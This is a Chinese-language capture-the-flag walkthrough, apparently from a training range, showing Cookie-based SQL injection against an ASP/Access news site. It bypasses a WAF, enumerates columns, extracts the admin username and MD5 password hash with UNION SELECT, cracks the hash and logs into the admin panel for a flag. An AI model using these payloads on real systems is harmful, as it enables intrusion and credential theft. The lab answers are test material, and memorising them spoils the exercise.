Access注入之Cookie注入

我們進入新聞頁面，隨便點選一條新聞進入

我們通過測試發現URL傳參是有檢測的，有WAF進行攔截，於是我們換一種思路，測試一下Cookie注入

我們通過測試Cookie傳參id值

判斷注入存在

設定Cookie：
document.cookie="id="+escape("171")

訪問網址：
http://kypt8004.ia.aqlab.cn/shownews.asp

頁面返回的是id=171的頁面，可以證明id傳參是有效的，可能存在Cookie注入

繼續測試證明注入存在：
document.cookie="id="+escape("171 and 1=1") #頁面正常
document.cookie="id="+escape("171 and 1=2") #頁面異常
 

判斷欄位數

document.cookie="id="+escape("171 order by 10") #頁面正常
document.cookie="id="+escape("171 order by 11") #頁面異常

得出欄位數為10

判斷顯錯點

這裡有一點需要注意的是Access資料庫與MySQL資料庫不同
  Access資料庫進行查詢時必須填寫正確的表名才能查詢
  
document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin")

得出顯錯點為2，3位

查詢資料

document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")

得出username=admin&password=b9a2a2b5dffb918c
 

我們注意到這個password是個md5值，於是我們去解密以下
得到密碼為：welcome

於是我們去登陸網站後臺

後臺地址：http://kypt8004.ia.aqlab.cn/admin/Login.asp

登陸後得到最終flag為：zkz{welcome-control}